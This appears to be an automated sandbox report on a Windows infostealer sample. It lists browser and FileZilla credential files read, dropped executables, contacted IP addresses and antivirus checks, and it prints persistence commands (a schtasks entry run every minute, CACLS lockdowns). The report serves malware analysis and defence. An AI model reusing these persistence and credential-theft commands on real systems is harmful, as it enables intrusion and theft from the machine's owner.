GetDiskFreeSpaceW May 26, 2023, 9:13 a.m.	number_of_free_clusters: 2425474 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 26, 2023, 9:13 a.m.	number_of_free_clusters: 2425474 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1

Steals private information from local Internet browsers (6 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State

Creates executable files on the filesystem (8 events)

file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\cred64.dll
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\y6317478.exe
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\y0651307.exe
file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\m8217450.exe
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\n9782940.exe
file	C:\Users\test22\AppData\Local\Temp\IXP002.TMP\k9845936.exe
file	C:\Users\test22\AppData\Local\Temp\IXP002.TMP\l5196213.exe

Creates a suspicious process (4 events)

cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN metado.exe /TR "C:\Users\test22\AppData\Local\Temp\a9e2a16078\metado.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN metado.exe /TR "C:\Users\test22\AppData\Local\Temp\a9e2a16078\metado.exe" /F
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "metado.exe" /P "test22:N"&&CACLS "metado.exe" /P "test22:R" /E&&echo Y\|CACLS "..\a9e2a16078" /P "test22:N"&&CACLS "..\a9e2a16078" /P "test22:R" /E&&Exit
cmdline	C:\Windows\system32\cmd.exe /S /D /c" echo Y"

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\a9e2a16078\metado.exe

Drops an executable to the user AppData folder (2 events)

file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file	C:\Users\test22\AppData\Local\Temp\a9e2a16078\metado.exe

A process created a hidden window (4 events)

Time & API	Arguments	Status	Return
ShellExecuteExW May 26, 2023, 9:13 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\a9e2a16078\metado.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\a9e2a16078\metado.exe	1	1
ShellExecuteExW May 26, 2023, 9:13 a.m.	show_type: 0 filepath_r: SCHTASKS parameters: /Create /SC MINUTE /MO 1 /TN metado.exe /TR "C:\Users\test22\AppData\Local\Temp\a9e2a16078\metado.exe" /F filepath: SCHTASKS	1	1
ShellExecuteExW May 26, 2023, 9:13 a.m.	show_type: 0 filepath_r: cmd parameters: /k echo Y\|CACLS "metado.exe" /P "test22:N"&&CACLS "metado.exe" /P "test22:R" /E&&echo Y\|CACLS "..\a9e2a16078" /P "test22:N"&&CACLS "..\a9e2a16078" /P "test22:R" /E&&Exit filepath: cmd	1	1
ShellExecuteExW May 26, 2023, 9:14 a.m.	show_type: 0 filepath_r: rundll32.exe parameters: C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main filepath: rundll32.exe	1	1

An executable file was downloaded by the process metado.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile May 26, 2023, 9:14 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $,CyáCyáCyáâ~Iyáä~Ëyáå~Qyáå~Lyáâ~Ryáä~byáà~FyáCyàyáØè~@yáØá~ByáØByáØã~ByáRichCyáPELkpodà!Þ>ð°@ J<K<øT ?p?@ð,.textVÝÞ `.rdataîaðbâ@@.dataD`D@À.rsrcøP@@.relocTR@Bj h¨<¹phè?#hêèYÃÌÌÌj8hÌ<¹hè#h`êèlYÃÌÌÌj8hÌ<¹ hèÿ"hÀêèLYÃÌÌÌj8hÌ<¹¸hèß"h ëè,YÃÌÌÌj8h=¹Ðhè¿"hëè*YÃÌÌÌj0hD=¹èhè"hàëèì)YÃÌÌÌj0hx=¹iè"h@ìèÌ)YÃÌÌÌhh°=¹iè\"h ìè©)YÃj?h>¹0iè?"híè)YÃÌÌÌÁÂÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇñfÖEÀPèÂ2ÄÆ^]ÂÌÌÌI¸\|<ÉEÁÃÌÌUìVñFÇñPèó2ÄöEtjVè«%ÄÆ^]ÂAÇñPèÉ2YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀÁfÖAÇA<ÇìñÃÌÌÌÌÌÌÌÌUììMôèÒÿÿÿhJEôPè2ÌÌÌÌUìVñWÀFPÇñfÖEÀPèò1ÄÇìñÆ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇñfÖEÀPè²1ÄÇ ñÆ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìQSZVWQSñè=h3É3À}üÛ~53Ò;ÇþEÐ=h¸phCph~r>A}üB;Ë\|Ë~r_ÆÆ^[å]Ã_ÆÆ^[å]ÃÌÌÌÌÌUììSVWòùQ}ôFPEðè3Û]ø9]ð)D~Ær¾Pè¯KÄÀu-NÆùr< tÆùrÏréÌ~Ær=@i3Ò Diÿt+EÿfD]ÿù¸0iC0i8]øtB;×ráÊÿEÈxr3Àÿt.MÿD=Di¹0i]ÿC 0i8]øt@;ÇrÝÈÿ=Di¹0iC 0iMìMôMøyr MøÏ+È 3Ò÷÷Mì}ô MøC]ø;]ðÜþÿÿrÆÇ_^[å]ÃÆÇ_^[å]ÃÌÌÌÌÌÌÌÌÌÌUìì@SVWÙòQMÄ]ôèçýÿÿEÄÖPMÜèYþÿÿhÇCÇCÆè°"Ø¹Èÿ]øûÄó«3Ò¾8>Bú@\|ðUì3ö3Û~øÒtAMø}ðEÜCEÜ¾øÿt'ÁæðÇxÏÆÓøMôPèUìïMøC;ÚrÂEøÀthPèð!ÄUðúr(MÜBÁúrIüÂ#+ÁÀüøwVRQèÀ!ÄUØÇEìÇEðÆEÜúr(MÄBÁúrIüÂ#+ÁÀüøwRQè~!ÄEô_^[å]ÃèGÌÌÌÌÌÌÌÌÌÌÌUìì4E0SVW3ÿÆEè¾À]ÇEàÇEäÆEÐ;Ç´+ÇMÐ;ÃBØ}4E CE SÇPèþr.MèVÁúrIüÂ#+ÁÀüøhRQè× ÄMÐ}Uó~EàEèCU}äuà]f~ÉMèCÁfÖEø;óu\îr; uÀÂîsïþüî: u7þýßH:Ju&þþÎH:Juþÿ½@:B±E0Guü;øõþÿÿ3ÿUþr/MèFÁþrIüÆ#+ÁÀüøVQè UÄEør'HÂùrRüÁ#+ÂÀüøw`QRèÏÄU4ÇEÇEÆEúr3M BÁúrIüÂ#+ÁÀüøwë uüGéWÿÿÿRQèÄÇ_^[å]Ãè Eè«ÌÌÌÌÌÌÌÌÌÌÌUìQS]Vñ]üWjhÀ>ÇFÇFÆèD3ÿÛ~1}ECE8S¿C ú¶È¶ÃGÈ¶ÁÎPèG;}ü\|ÏUúr(MBÁúrIüÂ#+ÁÀüøwRQèÑÄ_Æ^[å]ÃèïDÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìì0VWj$hÄ>MÐÇEàÇEäÆEÐèEÀu3öéÇ3ÿÀ¸ÇEøÇEüÆEè;ÇF+Ç¹;ÁBÈ}ECEQÇMèPèBìEÐÌPètìEèôìÌPèaÎèªþÿÿÄè¢üÿÿUüÄ0Àúr,MèBÁúrIüÂ#+ÁÀüø¹RQèÇÄEG;øHÿÿÿ¾Uäúr(MÐBÁúrIüÂ#+ÁÀüøwxRQèÄUúr^MBÁúrFIüÂ#+ÁÀüøwHë4úr(MèBÁúrIüÂ#+ÁÀüøw#RQè1Ä3öétÿÿÿRQè Ä_Æ^å]Ãè?CèJÌÌÌÌÌÌÌÌÌÌUìQEUMVÀS@WPè] ÄM}ØÓCM+ÑID ÿÀuóóNFÀuù+ñFVjÿðVøSWÿðPèÇ5ÄWÿðjÿñÿñWjÿñÿ ñUM_[^úr%BÁúrIüÂ#+ÁÀüøwRQèAÄå]ÃèdBÌÌÌÌUìì$SVWùjÇGÇGÆÿñÀj ÿ$ñØ]üÛlSÿðEôÀSjjjjjÿPjhéýÿððuøö.WN;ÊwOÇrÆëFGÙ+Ú+Â;Øw%ÇOrS4jVèE,ÆÄuøëQSÆEøÏÿuøSè¨]üÇrjjVPjÿÿuô request_handle: 0x00cc000c	1	1	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x000b7a00', u'virtual_address': u'0x0000c000', u'entropy': 7.9321221305693115, u'name': u'.rsrc', u'virtual_size': u'0x000b8000'}

entropy

7.93212213057

description

A section with a high entropy has been found

entropy

0.957627118644

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 26, 2023, 9:13 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Queries for potentially installed applications (50 out of 51 events)

Time & API	Arguments	Status
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000398 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: 7-Zip base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: AddressBook base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: Adobe AIR base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: Connection Manager base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: DirectDrawEx base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: EditPlus base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: Fontcore base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: Google Chrome base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: IE40 base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: IE4Data base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: IE5BAKEX base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: IEData base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: MobileOptionPack base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: Mozilla Thunderbird 78.4.0 (x86 ko) base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: Office15.PROPLUSR base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: SchedulingAgent base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: WIC base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: {00203668-8170-44A0-BE44-B632FA4D780F} base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: {26A24AE4-039D-4CA4-87B4-2F32180131F0} base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: {4A03706F-666A-4037-7777-5F2748764D10} base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: {90150000-0015-0409-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: {90150000-0016-0409-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: {90150000-0018-0409-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: {90150000-0019-0409-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: {90150000-001A-0409-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: {90150000-001B-0409-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: {90150000-001F-0409-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: {90150000-001F-040C-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: {90150000-001F-0C0A-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: {90150000-002C-0409-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: {90150000-0044-0409-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: {90150000-006E-0409-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: {90150000-0090-0409-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: {90150000-00A1-0409-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: {90150000-00BA-0409-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: {90150000-00E1-0409-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: {90150000-00E2-0409-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: {90150000-0115-0409-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: {90150000-0117-0409-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: {90150000-012B-0409-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: {91150000-0011-0000-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: {AC76BA86-7AD7-FFFF-7B44-AC0F074E4100} base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}	1
RegOpenKeyExW May 26, 2023, 9:13 a.m.	regkey_r: {BB8B979E-E336-47E7-96BC-1031C1B94561} base_handle: 0x00000398 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}	1

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN metado.exe /TR "C:\Users\test22\AppData\Local\Temp\a9e2a16078\metado.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN metado.exe /TR "C:\Users\test22\AppData\Local\Temp\a9e2a16078\metado.exe" /F

Executes one or more WMI queries which can be used to identify virtual machines (1 event)

wmi	SELECT * FROM Win32_Processor

Communicates with host for which no DNS query was performed (2 events)

host	77.91.68.62
host	83.97.73.122

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Installs itself for autorun at Windows startup (5 events)

reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP001.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP002.TMP\"
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN metado.exe /TR "C:\Users\test22\AppData\Local\Temp\a9e2a16078\metado.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN metado.exe /TR "C:\Users\test22\AppData\Local\Temp\a9e2a16078\metado.exe" /F

Harvests credentials from local FTP client softwares (2 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml

Executes one or more WMI queries (8 events)

wmi	SELECT * FROM Win32_VideoController
wmi	SELECT * FROM AntivirusProduct
wmi	SELECT * FROM Win32_OperatingSystem
wmi	SELECT * FROM Win32_Process Where SessionId='1'
wmi	SELECT * FROM AntiSpyWareProduct
wmi	SELECT * FROM FirewallProduct
wmi	SELECT * FROM Win32_DiskDrive
wmi	SELECT * FROM Win32_Processor

Collects information about installed applications (38 events)

Time & API	Arguments	Status
RegQueryValueExW May 26, 2023, 9:13 a.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
